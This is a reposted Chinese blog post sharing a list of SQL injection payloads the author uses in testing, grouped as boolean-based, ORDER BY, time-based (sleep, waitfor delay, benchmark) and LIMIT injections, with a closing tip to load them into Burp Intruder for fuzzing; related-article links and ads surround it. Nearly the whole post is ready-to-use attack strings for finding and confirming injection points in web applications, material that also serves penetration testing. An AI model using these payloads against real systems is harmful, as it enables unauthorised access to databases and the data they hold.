博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
分享一些平时测试用的sql payloads
阅读量:6305 次
发布时间:2019-06-22

本文共 2556 字,大约阅读时间需要 8 分钟。

1:BOOL SQLINJECTION

\

'
"
%df'
%df"
and 1=1
and 1=2
' and '1'='1
' and '1'='2
" and "1"="1
" and "1"="2
) and (1=1
) and (1=2
') and ('1'='1
') and ('1'='2
%' and 1=1 and '%'='
%' and 1=2 and '%'='x
%') and 1=1 and ('%'='
%') and 1=2 and ('%'='x
OR 1=1
OR 1=2
' OR 1=1-- -
' OR 1=2-- -
) OR 1=1-- -
) OR 1=2-- -
') OR 1=1-- -
') OR 1=2-- -
" OR "1"="1
" OR "1"="2
' OR '1'='1
' OR '1'='2
) OR (1=1
) OR (1=2
') OR ('1'='1
') OR ('1'='2

2:ORDER BY SQLINJECTION fuzz payload

(case when(1=1) then 1 else (select 1 union select 2) end)

(case when(1=2) then 1 else (select 1 union select 2) end)
,(1-(case when(1=1) then 1 else (select 1 union select 2) end))
,(1-(case when(1=2) then 1 else (select 1 union select 2) end))
,1=if((1=1),1,(select 1 union select 2))
,1=if((1=2),1,(select 1 union select 2))
,If((1=1),1,(select 1 union select 2))-- -
,If((1=2),1,(select 1 union select 2))-- -
,If((1=1),sleep(4),(select 1 union select 2))-- -
-IF((1=1),1,(SELECT 1 UNION SELECT 2))-- -
-IF((1=2),1,(SELECT 1 UNION SELECT 2))-- -
-(case when(1=1) then 1 else (select 1 union select 2) end)
-(case when(1=2) then 1 else (select 1 union select 2) end)

3:TIME-BASE SQLINJECTION

'%2b(if((1=1 and sleep(4)),1,(select 1 union select 2)))%2b'a

-IF((1=1),sleep(4),(SELECT 1 UNION SELECT 2))-- -
';(SELECT 1 FROM(SELECT(sleep(4)))lWuP)-- -
;SELECT sleep(4)
);SELECT sleep(4)-- -
;SELECT sleep(4)-- -
;(SELECT 1 FROM(SELECT(sleep(4)))lWuP)-- -
' AND SLEEP(4)%23
AND sleep(4)
' AND sleep(4) AND '1'='1
') AND sleep(4) AND ('1'='1
) AND sleep(4) AND (1=1
" AND sleep(4) AND "1"="
') and (select(0)from(select(sleep(4)))x)-- -
and (select(0)from(select(sleep(4)))x)
and (select(0)from(select(sleep(4)))x) and 1=1
' and (select(0)from(select(sleep(4)))x) and '1'='1
" and (select(0)from(select(sleep(4)))x) and "1"="1
) and (select(0)from(select(sleep(4)))x) and (1=1
') and (select(0)from(select(sleep(4)))x) and ('1'='1
rlike (select(0)from(select(sleep(4)))x) and 1=1
' rlike (select(0)from(select(sleep(4)))x) and '1'='1
) rlike (select(0)from(select(sleep(4)))x) and (1=1
') rlike (select(0)from(select(sleep(4)))x) and ('1'='1
;waitfor delay '0:0:4' -- -
';waitfor delay '0:0:4' -- -
);waitfor delay '0:0:4' -- -
');waitfor delay '0:0:4' -- -
if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/
(SELECT * FROM(SELECT(sleep(4)))lWuP)

4:LIMIT SQLINJECTION 

procedure analyse(extractvalue(1,if(1=1,benchmark(5000000,md5(1)),2)),1)

用法就不用多说,放burp instuder fuzz 就行了

转载于:https://www.cnblogs.com/depycode/p/5576204.html

你可能感兴趣的文章
异常处理
查看>>
javax.xml.ws.soap.SOAPFaultException: 没有Header,拦截器实施拦截
查看>>
Activity启动模式 及 Intent Flags 与 栈 的关联分析
查看>>
Java知多少(65)线程的挂起、恢复和终止
查看>>
response.setHeader各种使用方法
查看>>
OutputCache祥解
查看>>
jquery序列化form表单使用ajax提交后处理返回的json数据
查看>>
less命令
查看>>
[译] Paxos算法详解
查看>>
在Eclipse在使用JUnit4单元测试(0基础知识)
查看>>
Linq之Lambda表达式初步认识
查看>>
cas改造随笔
查看>>
Linux命令-某个用户组下面的所有用户
查看>>
【面试笔试】Java常见面试笔试总结
查看>>
java动态代理技术
查看>>
《大话设计模式》--外观模式
查看>>
基于ngx_lua的动态服务路由方案
查看>>
文件IO详解(四)---标准输入、标准输出和标准错误
查看>>
张小龙2018PRO版微信公开课演讲全文 透露2018微信全新计划
查看>>
JQuery判断CheckBox是否选中
查看>>
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
当前时间: 2025-01-10 12:26:57   当前IP: 3.12.76.168   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2
强烈建议你试试无所不能的CHAT-GPT,快点击我
强烈建议你试试无所不能的CHAT-GPT,快点击我